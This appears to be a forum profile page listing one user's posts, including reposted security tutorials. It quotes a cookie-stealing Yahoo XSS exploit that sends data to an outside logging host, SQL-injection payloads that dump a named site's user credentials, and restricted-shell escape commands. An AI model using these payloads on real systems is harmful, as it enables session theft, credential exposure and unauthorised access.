-
Posts
233 -
Joined
-
Last visited
-
Days Won
14
Posts posted by ionut97
-
-
Ce afiseaza cand trimitem "echo *" ?
-
La multi ani!
-
-
Pentru cine vrea sa se uite: http://taz.newffr.com/TAZ/Cryptologie/ReplaceNsaKey.zip
- 1
-
-
EDIT:
Full path disclosure:
-
Nu au cookie-uri.
-
-
-
FII Competition - Concurs Na?ional de Informatic?
Sec?iuni:
• Tehnologii Web
• Algoritmic? ?i Programare
• Art? Digital?
• Securitatea Informa?iei
- 2
-
https://ro.wikipedia.org/wiki/Romanian_Security_Team_RST
Mi se pare destul de cuprinzator articolul.
-
Thomas H Cormen, Charles E Leiserson, Ronald L Rivest, Clifford Stein - Introduction To Algorithms
Mersi!
-
HACKVIDS
This is a list of documentaries and miscellaneous videos about hackers, crackers, phreakers, software pirates and virus writers, compiled by Georgios Apostolidis.
Please keep in mind that this page is updated very rarely and some links may be broken. Contact me if you know about a documentary/video, which is not mentioned here.
Some titles:
-The KGB, the Computer and Me
-Unsolved Mysteries: Kevin Poulsen
-Hack Attack
-Walk on the Wild Side: Hackers and Phreakers
-Hackers 95
-Unauthorized Access
-Hackers
-Codes: makers and breakers
-Web Warriors
-Hackers Wanted
...
- 1
-
In paper scrie clar ca vulnerabilitatea era intr-un js folosit de toate subdomeniile adspecs.yahoo.com.
Totul a fost raportat si rezolvat.
http://www.exploit-db.com/wp-content/themes/exploit/docs/24109.pdf
"Final exploit":
<html>
<script>
window.name=' new Image().src="http://abysssec.com/log/log.php?cookie="+encodeURI(document.cookie); setTimeout(\"location.href = \'http:\/\/www.yahoo.com\';\",10);';
location.href="http://adspecs.yahoo.com/index.php";
</script>
</html>+ ca XSS-ul putea fi gasit cu DOMinator.
-
InetDaemon's Online IT Tutorials and Internet Training: Networking, Wireless, Telecom, Web Design
Content:
[B]Basic IT Tutorials[/B]
OSI Model
Concepts
Digital vs. Analog
Full Duplex
Half Duplex
Simplex
Frames
Packets
PDU's
Asynchronous
Synchronous
Circuits
Media
Parallel/Serial
Point-to-Point
Peer-to-Peer
Client-Server
Connection Oriented Protocols
Connectionless Protocols
Reliable vs. Unreliable
CRC Check
Number Systems
Binary
Octal
Decimal
Hexadecimal
Signalling
Signals
Wavelength
Phase
Amplitude
Frequency
Carrier
Analog vs. Digital
Media
Signal Power / Signal Strength
Modulation & Encoding
Return to Zero
Non-Return to Zero
Quadrature Amplitude Modulation (QAM)
2B1Q
AMI
Manchester Encoding
Differential Manchester Encoding
[B]
Computer Tutorials & Training[/B]
Hardware
Motherboard
Clock
Multiplier
Bus
CPU,
Memory,
I/O Controller
PCI & ISA
Software:
Operating Systems:
Berkeley Software Development UNIX (BSD UNIX)
UNIX (Solaris)
Linux
HP-UX
Microsoft Windows
Server
Server 2000
Server 2003
Server 2008
Windows 7 Server
Workstation
Windows 95
Windows 98
Windows XP
Windows Vista
Windows 7 Workstation
MacOS
Drivers
Applications
[B]Network Tutorials & Training[/B]
Local Area Networks
IEEE 802.x protocol Specification Documents (a list)
Network Topologies
Bus, Hub and Spoke (star), Point-to-Point, Point-to-Multipoint
ARP / RARP (address resolution)
BootP
DHCP
Bridging
Switching
Ethernet
FDDI
Token Ring
ATM Local Area Network Emulation (ATM LANE)
Wide Area Networks
Serial: v35, v.24, RS-232, EIA/TIA232;
HDLC
SDLC
PPP
ATM
[B]Satellite Tutorials & Training[/B]
Basic Terms
Antennas
Amplifiers
Travelling Wave Tube
Klystron Tube
Solid State
Automatic Repeat Request
Bandwidth Allocation
Frequency
Orbits
Polarity
Sun Outage
Tracking
Uplink Chain
Wave Guide
Basic Concepts
[B]Internet Tutorials & Training[/B]
Internet Protocol (IP)
Internet Control Message Protocol (ICMP)
Transmission Control Protocol (TCP and TCP/IP)
E-Mail
Simple Mail Transfer Protocol (SMTP)
Post Office Protocol v3 (POP3)
Internet Message Access Protocol (IMAP)
HypeText Transport Protocol (HTTP)
File Transfer Protocol (FTP)
Telnet
Secure SHell (ssh)
User Datagram Protocol (UDP and UDP/IP)
Domain Name Service (DNS)
Network Time Protocol (NTP)
Simple Network Management Protocol (SNMP)
Trivial File Transfer Protocol (TFTP)
Internet Protocol v6 (next generation/IPnG)
Internet Relay Chat (IRC)
Multi-Protocol Label Switching (MPLS)
Multicast
Internet Gateway Management Protocol (IGMP)
Network News Transport Protocol (NNTP)
Quality Of Service
Simple Network Time Protocol (SNTP)
Voice over Internet Protocol (VoIP)
[B]
World Wide Web Training[/B]
Web Servers
Web Browsers
Web Pages
Web Portals
Search Engines
HypeText Transport Protocol (HTTP)
HTML (Creating a web page)
SGML
Cascading Style Sheets (CSS)
CGI Scripting
Server Side Includes
JavaScript
Perl / PHP
ASP / JScript / VBScript
Java
[B]Telecommunications Tutorials & Training[/B]
Public Switched Telephone Network (North America)
X.25 (grandfather of all telecom protocols)
Frame Relay
Switched Multi-megabit Data Services (SMDS)
Integrated Services Digital Network (ISDN)
Digital Signalling System
n-Carrier systems
T-Carrier T1 T2 T3 T4
J-Carrier J1 J2 J3 J4
E-Carrier E1 E2 E3 E4
Optical Cabling
OC3, OC12, OC48, OC192
SONET
Synchronous Digital Hierarchy (SDH)
xDSL
Signalling System 7
Asynchronous Transfer Mode (ATM)
Cellular
[B]Troubleshooting Tutorials & Training[/B]
Fundamentals
IP Connectivity
LAN Troubleshooting
Building a Support Toolkit -
Part 1:
Part 2:
-
-
-
-
by ???Dan & DenJacker
What we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests.
First of, the database/table/columns.
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
PoC:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+
Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function.
View the source, and we see every single database/table/column accessible.
Now, to grab information from the columns.
(select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
PoC:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+
Sursa:
- 2
-
-
-
Introduction
Last year I was approached by a systems engineer and he offered me a steak dinner if I could escape the restricted shell he had set up on a Linux server. The restricted shell was being created due to a request from the development group needing access to certain servers for troubleshooting, and he wanted to restrict what they could do. I don't know about most of you, but a challenge alone from one of my colleagues is more than enough to get me going, but a steak dinner? Where do I sign?! The only thing better would have been a case of beer! I wasn't very familiar with restricted shells so off to Google I went for some assistance. It didn't take long before I noticed there was a lack of information on the topic. Information was scattered and most resources were not very descriptive. In addition to internet research, I also consulted the SANS GPWN e-mail distribution list to see if anybody had any cool tricks. It turns out, they did, but the consensus was that they'd like to see an article published covering this topic.
Scope
The purpose of this article is to create a better resource for penetration testers to assist them when confronted with a restricted shell. In no way will this be an exhaustive account of all techniques, but instead, I'm going to cite several of the most applicable and effective techniques in this handy reference document. This article is not going to cover defending restricted shell attacks, focus on specific flavors of Linux, nor is it going to cover every restricted shell since they can be configured many ways. Therefore, command line syntax may differ depending on the version of Linux you're familiar with. I will focus mainly on the techniques themselves. Of course, if you find a way to exploit a running process to escalate your privileges, then there is no need to escape the shell.
A Restricted Shell...What Is It?
It limits a user's ability and only allows them to perform a subset of system commands. Typically, a combination of some or all of the following restrictions are imposed by a restricted shell:
Using the 'cd' command to change directories.
Setting or unsetting certain environment variables (i.e. SHELL, PATH, etc...).
Specifying command names that contain slashes.
Specifying a filename containing a slash as an argument to the '.' built-in command.
Specifying a filename containing a slash as an argument to the '-p' option to the 'hash' built-in command.
Importing function definitions from the shell environment at startup.
Parsing the value of SHELLOPTS from the shell environment at startup.
Redirecting output using the '>', '>|', '', '>&', '&>', and '>>' redirection operators.
Using the 'exec' built-in to replace the shell with another command.
Adding or deleting built-in commands with the '-f' and '-d' options to the enable built-in.
Using the 'enable' built-in command to enable disabled shell built-ins.
Specifying the '-p' option to the 'command' built-in.
Turning off restricted mode with 'set +r' or 'set +o restricted'.
Since business needs override security a good portion of the time, it's possible that some of the above restrictions are relaxed. So do not assume that these restrictions are set in stone. I suggest you QC the quality of the restricted shell.
Reconnaissance
The first step should be to gather a little information. You'll need to know your environment. Run the 'env' command to understand how your profile is configured. You'll see which shell you're running and where your PATH is pointing to. Once you know what your PATH is, list the contents of the directory (i.e. 'ls /usr/local/rbin') to see which commands are present. It is possible you may not be able to run the 'ls' command. If not, you can use the 'echo' command with an asterisk to 'glob' directory contents if it's available:
echo /usr/local/rbin/*
You can continue on through the file system using this command to help you find other files and commands. Basically, you'll be armed with built-in shell commands as well as the ones listed in your PATH. This is your arsenal for attacking the restricted shell, but there may be exceptions as we'll find out. Once you know which commands you can execute, research each one of them to see if there are known shell escapes associated with them. Some of the techniques we're about to get into can be combined together.
Change PATH or SHELL Environment Variables
Type 'export —p' to see the exported variables in the shell. What this will also show you is which variables are read-only. You'll note that most likely the PATH and SHELL variables are '—rx', which means you execute them, but not write to them. If they are writeable, then you can start giggling now as you'll be able to escape the restricted shell in no time! If the SHELL variable is writeable, you can simply set it to your shell of choice (i.e. sh, bash, ksh, etc...). If the PATH is writeable, then you'll be able to set it to any directory you want. I recommend setting it to one that has commands vulnerable to shell escapes.
Copying Files
If you're able to copy files into your PATH, then you'll be able to bypass the forward slash restriction. The sky is the limit at this point as you can copy commands into the PATH that have known shell escapes. You can also write your own script, copy it to the PATH, and execute it.
Another technique is to try and copy files to your home directory and execute them from there. Execution will be difficult as you will have to use './' in order to get it to run, and as we already know, it will fail since the restricted shell will not allow the use of a forward slash. Keep in mind, you may be able to get the commands you copy to your home directory to run if you're able to couple it with another command that has a shell escape.
Other ways you may be able to copy files or get access to them include mounting a device or file system. You may also be able to copy them to your system using a program that can copy files such as SCP or FTP.
Try to find directories other than your PATH where you can execute commands from. If you have write access to them, you can copy commands here and may be able to execute them.
Lastly, consider creating a symbolic link in a directory where you have write access and the ability to run commands
Editors
One of the most well documented techniques is to spawn a shell from within an editor such as 'vi' or 'vim'. Open any file using one of these editors and type the following and execute it from within the editor:
:set shell=/bin/bash
Next, type and execute:
:shell
Another method is to type:
:! /bin/bash
If either of these works, you will have an unrestricted shell from within the editor. Most modern restricted shells already defend against this hack, but it's always worth a shot. You may be working from a restricted editor such as rvi or rvim, which will almost certainly stop a shell from spawning. Also, try different shells with this technique and ones that follow as some restricted shells may block 'sh' or 'bash'.
Awk Command
If you can run 'awk', you can attempt to execute a shell from within it.
Type the following:
awk 'BEGIN {system("/bin/sh")}'
If successful, you'll see an unrestricted shell prompt!
Find Command
If the 'find' command is present, you can attempt to use the '-exec' function within it.
Type the following:
find / -name blahblah —exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
Again, if successful, you'll see a blinking cursor at an unrestricted shell prompt! Note that in the above example, you are able to call the 'awk' command even if it is not present in our PATH. This is important because you are able to bypass the restriction of only being permitted to execute commands in your PATH. You are not limited to the 'awk' command.
More, Less, and Man Commands
There is a known escape within these commands. After you use the 'more', 'less', or 'man' command with a file, type '!' followed by a command. For instance, try the following once inside the file:
'! /bin/sh'
'!/bin/sh
'!bash'
Like the shell escape in 'awk' and 'find', if successful, you'll be sitting at an unrestricted shell prompt. Note you can try different shells, and the space after the '!' may not matter.
Tee Command
If you do not have access to an editor, and would like to create a script, you can make use of the 'tee' command. Since you cannot make use of '>' or '>>', the 'tee' command can help you direct your output when used in tandem with the 'echo' command. This is not a shell escape in of itself, but consider the following:
echo "evil script code" | tee script.sh
You will be able to create a file called script.sh in your home directory and add your script code to the file. Once the file is created, use the 'tee —a' option for all subsequent commands as the '-a' allows you to append to the file rather than overwrite the file.
Favorite Language?
Try invoking a SHELL through your favorite language:
python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
irb(main:001:0> exec "/bin/sh"
Most likely, you will not be able to execute any of these, but it's worth a shot in case they're installed.
Files Executed in Unrestricted Mode?
Some restricted shells will start by running some files in an unrestricted mode before the restricted shell is applied. If your .bash_profile is executed in an unrestricted mode and it's editable, you'll be able to execute code and commands as an unrestricted user.
Conclusion
This article is far from conclusive on techniques used to escape restricted shells, but hopefully it was informative and helped you learn some new tricks. What I've come to discover is that there are many ways to attack a restricted shell. You truly are only limited by your imagination. I encourage everyone to try these methods and expand on them and develop new techniques!
Sursa:
-
Description: In this video I will show you how to use this four modules.
HTTP Virtual Host Brute Force Scanner | Metasploit Exploit Database (DB)
HTTP Directory Scanner | Metasploit Exploit Database (DB)
Archive.org Stored Domain URLs | Metasploit Exploit Database (DB)
HTTP SSL Certificate Impersonation | Metasploit Exploit Database (DB)
1 ) auxiliary/scanner/http/vhost_scanner
This module tries to identify unique virtual hosts hosted by the target web server.
2 ) auxiliary/scanner/http/dir_scanner
This module identifies the existence of interesting directories in a given directory path.
3 ) auxiliary/scanner/http/enum_wayback
This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages.
4 ) auxiliary/scanner/http/impersonate_ssl
This module request a copy of the remote SSL certificate and creates a local (self.signed) version using the information from the remote version. The module then Outputs (PEM|DER) format private key / certificate and a combined version for use in Apache or other Metasploit modules requiring SSLCert Inputs for private key / CA cert have been provided for those with diginator certs hanging about!
Source : - Penetration Testing Software | Metasploit
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Original Source:
DefCamp Bucuresti 2013 - Live
in Stiri securitate
Posted
La minutul 2:32 apare standul unde erau realizate badge-urile.